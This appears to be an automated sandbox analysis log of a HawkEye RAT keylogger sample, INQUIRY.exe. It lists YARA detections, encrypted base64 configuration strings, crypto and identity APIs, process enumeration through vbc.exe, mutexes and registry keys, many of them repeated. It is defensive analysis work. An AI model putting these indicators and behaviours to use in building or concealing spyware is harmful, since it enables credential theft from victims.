                    Source: 27.2.INQUIRY.exe.25e0000.2.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 27.2.INQUIRY.exe.25e0000.2.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 33.2.INQUIRY.exe.22f0000.2.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 33.2.INQUIRY.exe.22f0000.2.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 16.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 16.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 28.2.INQUIRY.exe.2240000.2.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 28.2.INQUIRY.exe.2240000.2.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 28.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 28.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 13.2.INQUIRY.exe.2660000.3.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 13.2.INQUIRY.exe.2660000.3.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 1.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 1.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0.2.INQUIRY.exe.2640000.3.unpack, Form1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                    Source: 0.2.INQUIRY.exe.2640000.3.unpack, Form1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                    Source: 0.2.INQUIRY.exe.2640000.3.unpack, Form1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                    Source: 0.2.INQUIRY.exe.2640000.3.unpack, Form1.csCryptographic APIs: 'CreateDecryptor'
                    Source: 1.2.INQUIRY.exe.2270000.2.unpack, Form1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                    Source: 1.2.INQUIRY.exe.2270000.2.unpack, Form1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                    Source: 1.2.INQUIRY.exe.2270000.2.unpack, Form1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                    Source: 1.2.INQUIRY.exe.2270000.2.unpack, Form1.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.INQUIRY.exe.2640000.3.unpack, Form1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                    Source: 0.2.INQUIRY.exe.2640000.3.unpack, Form1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                    Source: 0.2.INQUIRY.exe.2640000.3.unpack, Form1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                    Source: 0.2.INQUIRY.exe.2640000.3.unpack, Form1.csCryptographic APIs: 'CreateDecryptor'
                    Source: 1.2.INQUIRY.exe.2270000.2.unpack, Form1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                    Source: 1.2.INQUIRY.exe.2270000.2.unpack, Form1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                    Source: 1.2.INQUIRY.exe.2270000.2.unpack, Form1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                    Source: 1.2.INQUIRY.exe.2270000.2.unpack, Form1.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.INQUIRY.exe.2640000.3.unpack, Form1.csBase64 encoded string: 'V9z0MtEfK2EI50ruA/sX5435SES1SZRTR7cTqTnmp3AxYZifJxwgy7QFTKhlmSGx', 'xs2M8HBBKsXOBp/txdt4WH36BZtFcWtpatuDMJkzHUo9RE6HRhBOXZQPez9CEdmS', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                    Source: 1.2.INQUIRY.exe.2270000.2.unpack, Form1.csBase64 encoded string: 'V9z0MtEfK2EI50ruA/sX5435SES1SZRTR7cTqTnmp3AxYZifJxwgy7QFTKhlmSGx', 'xs2M8HBBKsXOBp/txdt4WH36BZtFcWtpatuDMJkzHUo9RE6HRhBOXZQPez9CEdmS', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                    Source: 1.2.INQUIRY.exe.2300000.3.unpack, Form1.csBase64 encoded string: 'V9z0MtEfK2EI50ruA/sX5435SES1SZRTR7cTqTnmp3AxYZifJxwgy7QFTKhlmSGx', 'xs2M8HBBKsXOBp/txdt4WH36BZtFcWtpatuDMJkzHUo9RE6HRhBOXZQPez9CEdmS', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                    Source: 1.2.INQUIRY.exe.400000.0.unpack, Form1.csBase64 encoded string: 'V9z0MtEfK2EI50ruA/sX5435SES1SZRTR7cTqTnmp3AxYZifJxwgy7QFTKhlmSGx', 'xs2M8HBBKsXOBp/txdt4WH36BZtFcWtpatuDMJkzHUo9RE6HRhBOXZQPez9CEdmS', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                    Source: 13.2.INQUIRY.exe.2660000.3.unpack, Form1.csBase64 encoded string: 'V9z0MtEfK2EI50ruA/sX5435SES1SZRTR7cTqTnmp3AxYZifJxwgy7QFTKhlmSGx', 'xs2M8HBBKsXOBp/txdt4WH36BZtFcWtpatuDMJkzHUo9RE6HRhBOXZQPez9CEdmS', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                    Source: 16.2.INQUIRY.exe.2370000.2.unpack, Form1.csBase64 encoded string: 'V9z0MtEfK2EI50ruA/sX5435SES1SZRTR7cTqTnmp3AxYZifJxwgy7QFTKhlmSGx', 'xs2M8HBBKsXOBp/txdt4WH36BZtFcWtpatuDMJkzHUo9RE6HRhBOXZQPez9CEdmS', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                    Source: 16.2.INQUIRY.exe.2490000.3.unpack, Form1.csBase64 encoded string: 'V9z0MtEfK2EI50ruA/sX5435SES1SZRTR7cTqTnmp3AxYZifJxwgy7QFTKhlmSGx', 'xs2M8HBBKsXOBp/txdt4WH36BZtFcWtpatuDMJkzHUo9RE6HRhBOXZQPez9CEdmS', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                    Source: 16.2.INQUIRY.exe.400000.0.unpack, Form1.csBase64 encoded string: 'V9z0MtEfK2EI50ruA/sX5435SES1SZRTR7cTqTnmp3AxYZifJxwgy7QFTKhlmSGx', 'xs2M8HBBKsXOBp/txdt4WH36BZtFcWtpatuDMJkzHUo9RE6HRhBOXZQPez9CEdmS', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                    Source: 27.2.INQUIRY.exe.2640000.3.unpack, Form1.csBase64 encoded string: 'V9z0MtEfK2EI50ruA/sX5435SES1SZRTR7cTqTnmp3AxYZifJxwgy7QFTKhlmSGx', 'xs2M8HBBKsXOBp/txdt4WH36BZtFcWtpatuDMJkzHUo9RE6HRhBOXZQPez9CEdmS', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                    Source: 28.2.INQUIRY.exe.22f0000.3.unpack, Form1.csBase64 encoded string: 'V9z0MtEfK2EI50ruA/sX5435SES1SZRTR7cTqTnmp3AxYZifJxwgy7QFTKhlmSGx', 'xs2M8HBBKsXOBp/txdt4WH36BZtFcWtpatuDMJkzHUo9RE6HRhBOXZQPez9CEdmS', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                    Source: 28.2.INQUIRY.exe.400000.0.unpack, Form1.csBase64 encoded string: 'V9z0MtEfK2EI50ruA/sX5435SES1SZRTR7cTqTnmp3AxYZifJxwgy7QFTKhlmSGx', 'xs2M8HBBKsXOBp/txdt4WH36BZtFcWtpatuDMJkzHUo9RE6HRhBOXZQPez9CEdmS', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                    Source: 28.2.INQUIRY.exe.2240000.2.unpack, Form1.csBase64 encoded string: 'V9z0MtEfK2EI50ruA/sX5435SES1SZRTR7cTqTnmp3AxYZifJxwgy7QFTKhlmSGx', 'xs2M8HBBKsXOBp/txdt4WH36BZtFcWtpatuDMJkzHUo9RE6HRhBOXZQPez9CEdmS', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                    Source: 0.2.INQUIRY.exe.2640000.3.unpack, Form1.csBase64 encoded string: 'V9z0MtEfK2EI50ruA/sX5435SES1SZRTR7cTqTnmp3AxYZifJxwgy7QFTKhlmSGx', 'xs2M8HBBKsXOBp/txdt4WH36BZtFcWtpatuDMJkzHUo9RE6HRhBOXZQPez9CEdmS', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                    Source: 1.2.INQUIRY.exe.2270000.2.unpack, Form1.csBase64 encoded string: 'V9z0MtEfK2EI50ruA/sX5435SES1SZRTR7cTqTnmp3AxYZifJxwgy7QFTKhlmSGx', 'xs2M8HBBKsXOBp/txdt4WH36BZtFcWtpatuDMJkzHUo9RE6HRhBOXZQPez9CEdmS', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                    Source: 1.2.INQUIRY.exe.2300000.3.unpack, Form1.csBase64 encoded string: 'V9z0MtEfK2EI50ruA/sX5435SES1SZRTR7cTqTnmp3AxYZifJxwgy7QFTKhlmSGx', 'xs2M8HBBKsXOBp/txdt4WH36BZtFcWtpatuDMJkzHUo9RE6HRhBOXZQPez9CEdmS', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                    Source: 1.2.INQUIRY.exe.400000.0.unpack, Form1.csBase64 encoded string: 'V9z0MtEfK2EI50ruA/sX5435SES1SZRTR7cTqTnmp3AxYZifJxwgy7QFTKhlmSGx', 'xs2M8HBBKsXOBp/txdt4WH36BZtFcWtpatuDMJkzHUo9RE6HRhBOXZQPez9CEdmS', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                    Source: 13.2.INQUIRY.exe.2660000.3.unpack, Form1.csBase64 encoded string: 'V9z0MtEfK2EI50ruA/sX5435SES1SZRTR7cTqTnmp3AxYZifJxwgy7QFTKhlmSGx', 'xs2M8HBBKsXOBp/txdt4WH36BZtFcWtpatuDMJkzHUo9RE6HRhBOXZQPez9CEdmS', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                    Source: 16.2.INQUIRY.exe.2370000.2.unpack, Form1.csBase64 encoded string: 'V9z0MtEfK2EI50ruA/sX5435SES1SZRTR7cTqTnmp3AxYZifJxwgy7QFTKhlmSGx', 'xs2M8HBBKsXOBp/txdt4WH36BZtFcWtpatuDMJkzHUo9RE6HRhBOXZQPez9CEdmS', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                    Source: 16.2.INQUIRY.exe.2490000.3.unpack, Form1.csBase64 encoded string: 'V9z0MtEfK2EI50ruA/sX5435SES1SZRTR7cTqTnmp3AxYZifJxwgy7QFTKhlmSGx', 'xs2M8HBBKsXOBp/txdt4WH36BZtFcWtpatuDMJkzHUo9RE6HRhBOXZQPez9CEdmS', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                    Source: 16.2.INQUIRY.exe.400000.0.unpack, Form1.csBase64 encoded string: 'V9z0MtEfK2EI50ruA/sX5435SES1SZRTR7cTqTnmp3AxYZifJxwgy7QFTKhlmSGx', 'xs2M8HBBKsXOBp/txdt4WH36BZtFcWtpatuDMJkzHUo9RE6HRhBOXZQPez9CEdmS', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                    Source: 27.2.INQUIRY.exe.2640000.3.unpack, Form1.csBase64 encoded string: 'V9z0MtEfK2EI50ruA/sX5435SES1SZRTR7cTqTnmp3AxYZifJxwgy7QFTKhlmSGx', 'xs2M8HBBKsXOBp/txdt4WH36BZtFcWtpatuDMJkzHUo9RE6HRhBOXZQPez9CEdmS', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                    Source: 28.2.INQUIRY.exe.22f0000.3.unpack, Form1.csBase64 encoded string: 'V9z0MtEfK2EI50ruA/sX5435SES1SZRTR7cTqTnmp3AxYZifJxwgy7QFTKhlmSGx', 'xs2M8HBBKsXOBp/txdt4WH36BZtFcWtpatuDMJkzHUo9RE6HRhBOXZQPez9CEdmS', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                    Source: 28.2.INQUIRY.exe.400000.0.unpack, Form1.csBase64 encoded string: 'V9z0MtEfK2EI50ruA/sX5435SES1SZRTR7cTqTnmp3AxYZifJxwgy7QFTKhlmSGx', 'xs2M8HBBKsXOBp/txdt4WH36BZtFcWtpatuDMJkzHUo9RE6HRhBOXZQPez9CEdmS', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                    Source: 28.2.INQUIRY.exe.2240000.2.unpack, Form1.csBase64 encoded string: 'V9z0MtEfK2EI50ruA/sX5435SES1SZRTR7cTqTnmp3AxYZifJxwgy7QFTKhlmSGx', 'xs2M8HBBKsXOBp/txdt4WH36BZtFcWtpatuDMJkzHUo9RE6HRhBOXZQPez9CEdmS', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                    Source: 13.2.INQUIRY.exe.2660000.3.unpack, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: 0.2.INQUIRY.exe.2640000.3.unpack, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: 1.2.INQUIRY.exe.2300000.3.unpack, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: 28.2.INQUIRY.exe.2240000.2.unpack, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: 1.2.INQUIRY.exe.400000.0.unpack, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: 28.2.INQUIRY.exe.22f0000.3.unpack, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: 28.2.INQUIRY.exe.400000.0.unpack, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: 1.2.INQUIRY.exe.2270000.2.unpack, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: 16.2.INQUIRY.exe.2370000.2.unpack, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: 16.2.INQUIRY.exe.400000.0.unpack, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: 27.2.INQUIRY.exe.2640000.3.unpack, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: 16.2.INQUIRY.exe.2490000.3.unpack, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: 13.2.INQUIRY.exe.2660000.3.unpack, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: 0.2.INQUIRY.exe.2640000.3.unpack, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: 1.2.INQUIRY.exe.2300000.3.unpack, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: 28.2.INQUIRY.exe.2240000.2.unpack, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: 1.2.INQUIRY.exe.400000.0.unpack, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: 28.2.INQUIRY.exe.22f0000.3.unpack, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: 28.2.INQUIRY.exe.400000.0.unpack, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: 1.2.INQUIRY.exe.2270000.2.unpack, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: 16.2.INQUIRY.exe.2370000.2.unpack, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: 16.2.INQUIRY.exe.400000.0.unpack, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: 27.2.INQUIRY.exe.2640000.3.unpack, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: 16.2.INQUIRY.exe.2490000.3.unpack, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@46/34@17/4
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00420A80 GetLastError,FormatMessageA,0_2_00420A80
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00420A80 GetLastError,FormatMessageA,0_2_00420A80
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00408B82 GetDiskFreeSpaceA,0_2_00408B82
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00408B82 GetDiskFreeSpaceA,0_2_00408B82
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_00411196 CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,QueryFullProcessImageNameW,CloseHandle,free,Process32NextW,CloseHandle,6_2_00411196
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_00411196 CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,QueryFullProcessImageNameW,CloseHandle,free,Process32NextW,CloseHandle,6_2_00411196
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00417214 FindResourceA,LoadResource,SizeofResource,LockResource,0_2_00417214
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00417214 FindResourceA,LoadResource,SizeofResource,LockResource,0_2_00417214
                    Source: C:\Users\user\Desktop\INQUIRY.exeFile created: C:\Users\user\AppData\Roaming\pid.txtJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeFile created: C:\Users\user\AppData\Roaming\pid.txtJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6808
                    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5896
                    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1364
                    Source: C:\Users\user\Desktop\INQUIRY.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6808
                    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5896
                    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1364
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WEREF38.tmpJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WEREF38.tmpJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Users\user\Desktop\INQUIRY.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Users\user\Desktop\INQUIRY.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Users\user\Desktop\INQUIRY.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Users\user\Desktop\INQUIRY.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Users\user\Desktop\INQUIRY.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Users\user\Desktop\INQUIRY.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Users\user\Desktop\INQUIRY.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Users\user\Desktop\INQUIRY.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Users\user\Desktop\INQUIRY.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Users\user\Desktop\INQUIRY.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dllJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dllJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                    Source: C:\Users\user\Desktop\INQUIRY.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                    Source: C:\Users\user\Desktop\INQUIRY.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                    Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                    Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                    Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                    Source: C:\Users\user\Desktop\INQUIRY.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                    Source: C:\Users\user\Desktop\INQUIRY.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
